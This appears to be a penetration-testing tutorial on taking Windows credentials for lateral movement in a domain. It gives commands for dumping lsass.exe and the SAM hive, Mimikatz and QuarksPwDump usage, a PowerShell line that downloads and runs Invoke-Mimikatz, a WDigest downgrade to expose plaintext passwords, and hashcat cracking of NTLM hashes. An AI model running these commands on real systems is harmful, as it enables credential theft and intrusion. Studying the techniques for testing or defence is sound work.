Intranet Lateral Movement: Obtaining a Domain’s Single-Server Password and Hash

Lateral movement
In intranet penetration, when an attacker gains control of a machine on the intranet, the compromised host will be used as a springboard to access other machines in the domain through various methods such as collecting credentials in the domain to further expand the scope of assets. Through such methods, the attacker may eventually gain access to the domain controller, or even completely control the entire intranet environment based on the Windows operating system, and control all machines in the domain environment.

In intranet penetration, many methods of lateral movement require the attacker to obtain the password or hash value of the domain user before proceeding, such as hash transfer attacks, various bill transfers, and golden bill maintenance permissions. In this article, we first explain the method of obtaining the single-machine password in the domain during lateral movement, and the next article will discuss the several attack methods.

Password in Windows
After Windows2000, Windows machines use the NTLM algorithm to store the user’s password locally, and the NTLM hash of the password is stored in the %SystemRoot%\System32\config\SAM file. The Windows operating system usually uses two methods to hash the user’s password, namely, LAN Manager (LM) hash and NT LAN Manager (NTLM) hash. The so-called hash (Hash), that is, using an encryption method to encrypt the plaintext password, an encryption operation on a string of any length can return a fixed-length string. The password password encrypted by Windows is called Hash.

The password in the Windows operating system generally consists of two parts: one part is LM Hash, and the other part is NTLM Hash. In Windows, the structure of Hash is usually as follows:


In systems after windows2000, the LM-hash in the first part is empty. Because LM-hash can be easily cracked, this value is empty by default after windows2000, so the NTLM-hash in the second part is really the user password The hash value.

In the penetration test, the Hash of all users can usually be obtained from the SAM file in the Windows system and the NTDS.dit file of the domain controller (in a domain environment, user information is stored in NTDS.dit). You can also read the lsass.exe process through Mimikatz to obtain the NTLM hash and plaintext values of the logged-in user.

Obtain plaintext password or password hash
After obtaining the Hash, we can use a cracking tool to crack the plaintext password, or we can perform a hash transfer attack (PTH) to penetrate horizontally.

PwDump7 tool
Download link:

Pwdump7 can extract the user’s password hash (including LM and NTLM) in the system under CMD. System permissions are required. Hackers at the “hardcore” level may have heard of this toy. The HASH extracted by Pwdump7 can be used to break the plaintext password with tools such as ophcrack, which is very helpful for further penetration.

The tool is very simple to use. Just run the Pwdump7 program in the command line environment to get the password Hash of each user in the current system (including LM and NTLM):

Mimikatz tools
Download link:

Mimikatz is a powerful and lightweight debugging tool developed by the Frenchman Benjamin. Because of its powerful function, it can directly read the plaintext password of the Windows operating system and is well-known in the field of penetration testing. Through it, you can elevate the process permissions to inject the process to read the process memory. Of course, his biggest highlight is that he can directly obtain the password of the current login system user name from the lsass.exe process. lsass is the security mechanism of Microsoft Windows system. It is mainly used Local security and login strategy, usually after we enter the password when logging in to the system, the password will be stored in the memory of lsass, after the two modules of wdigest and tspkg are called, it is encrypted using a reversible algorithm and stored in the memory , And mimikatz obtains the plaintext password through the inverse calculation of lsass! In other words, as long as you don’t restart the computer, you can get the login password through him, only the current login system!

Note: But when the KB2871997 patch is installed or the system version is greater than win10 or windows server 2012, it is forbidden to save plain text passwords in the memory cache by default, so that the use of mimikatz can not read the plain text passwords from the memory, but you can modify the registry Way to grab the plaintext.

Mimikatz is the most commonly used method when reading plaintext passwords and hashes. Administrator rights are required.

privilege::debug      // Elevate to debug permissions
sekurlsa::logonpasswords       // Get password

Procdump is a tool officially released by Microsoft, so the anti-virus software will not intercept it. It can be used to export the target lsass file. Download link:

First upload the Microsoft tool Procdump on the target machine and export its lsass.exe:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

After downloading the lsass.dmp exported on the target machine to the local, execute mimikatz to export the password and hash in lsass.dmp:

sekurlsa::minidump Directory\lsass.dmp       // Load the exported lsass.dmp into mimikatz
sekurlsa::logonpasswords full                 // Get password

Grab password and hash through SAM and System files
First use the registry command to export the sam or system file of the target machine. Administrator rights are required:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

Then, download sam.hive and system.hive on the target machine to the local, and use mimikatz to read sam and system files to obtain NTLM Hash:

lsadump::sam /sam:sam.hive /system:system.hive

You can also directly use mimikatz to read the local SAM file and get the password Hash:


Quarks PwDump tool
Download link:

Quarks PwDump is an open source Windows user credential extraction tool, which can grab various types of user credentials under the windows platform, including: local accounts, domain accounts, cached domain accounts and Bitlocker. Currently it supports Windows XP/2003/Vista/7/8 version, which is quite stable.

Use requires administrator rights:

QuarksPwDump.exe --dump-hash-local        // Export local hash value
QuarksPwDump.exe -dhl

QuarksPwDump.exe -dhdc         // Export the domain control hash value in memory
QuarksPwDump.exe --dump-hash-domain-cached

Use Powershell script
Use the powershell script to load the mimikatz module to obtain the password. The script is located in the post-infiltration framework of powersploit. Download address:

The password can be obtained by remotely downloading and executing the powershell script on the target machine, which requires administrator privileges.

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"

powershell -exec bypass -c "& {Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCreds}"

Windows password hash cracking method
Ophcrack online cracking
After obtaining the password hash, we need to crack it to get the plaintext password. Nowadays, there are many websites on the Internet that provide online password cracking services. After obtaining the password hash, you can crack it online.


Enter the obtained NTLM Hash into the first query box and click GO to crack. Passwords with less than 14 digits can usually be cracked in a few minutes:

ophcrack tool
ophcrack is a Windows password hash value cracking tool, which officially provides us with dozens of GB hash tables.

ophcrack download link:

The download link of the rainbow table provided by ophcrack:

Ophcrack is very simple to use. Open the program, click Load to import the hash value, and then after loading Tables, execute Crack to crack:

ophcrack for details:Ophcrack and rainbow table


Hashcat tool
Hashcat is known as the fastest password cracking tool in the world, the world’s first and only engine based on GPGPU rules.

Download link for Windows:

Linux version download address:

After downloading, enter the source directory and execute the “make && make install” command to compile and install.

Execute “hashcat -h” to enter the help page:

(1) -m specifies the hash value type

For example, we often use

-m 1000: NTLM
-m 5600: Net-NTLMv2
-m 5500: NetNTLMv1 / NetNTLMv1+ESS
-m 0: MD5
-m 2500: WPA/PSK
For more hash types, please see the official website:

(2) -a specifies the crack mode

-a 0: dictionary mode
-a 1: Combination mode
-a 3: Mask brute force cracking
The rules directory contains various rules for generating the dictionary. We save the basic information in the base.txt file in the current directory.

Place the prepared dictionary passwords.txt and the hash value file hash.txt to be cracked into the directory where hashcat is located

./hashcat -m xx -a 0 <hashfile> <passwords.list1> <passwords.list2>
./hashcat -m 1000 -a 0 hash.txt -o result.txt passwords.txt
./hashcat -m 1000 -a 0 NTLM Hash passwords.txt
-a 0: Specify to crack in dictionary mode.

-m xx: Specify the type of hash value in the hashfile file.

-o: Write the cracked result to the file

<hashfile>: Store multiple hash values in a file, waiting to be cracked.

<passwords.list>: Specify the dictionary file.

The function of Hashcat is very powerful, there are many things that can be done, and you should explore it slowly.

Related precautions
In order to prevent users’ plaintext passwords from leaking in memory, Microsoft released the KB2871997 patch, which closed the Wdigest function. Windows Server 2012 and above versions turn off Wdigest by default, so that attackers cannot obtain plaintext passwords from memory. In versions below Windows Server 2012, if the KB2871997 patch is installed, the attacker cannot obtain the plaintext password.

There are two ways to enable or disable Wdigest Auth in the command line environment:

Use the red add command

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f           // turn on Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f           // turn off Wdigest Auth

Attack method: You need to set the value of UseLogonCredential to 1, and then log out the current user. After the user logs in again, use mimikatz to export the plaintext password.

The Invoke-MimikatzWDigestDowngrade script in Nishang integrates this function, the address is as follows:

In this section, we introduce the method of obtaining the single-machine password and Hash in the domain during the intranet penetration. After obtaining the Hash, we can use tools to blast and obtain the plaintext password. It can also be used for hash transfer, bill transfer, etc. Intranet penetration is still very useful for intranet penetration.

In the next section, we will explain in detail the intranet lateral movement methods such as PTH and PTT.


There are no reviews yet.

Be the first to review “Intranet Lateral Movement: Obtaining a Domain’s Single-Server Password and Hash”

Your email address will not be published. Required fields are marked *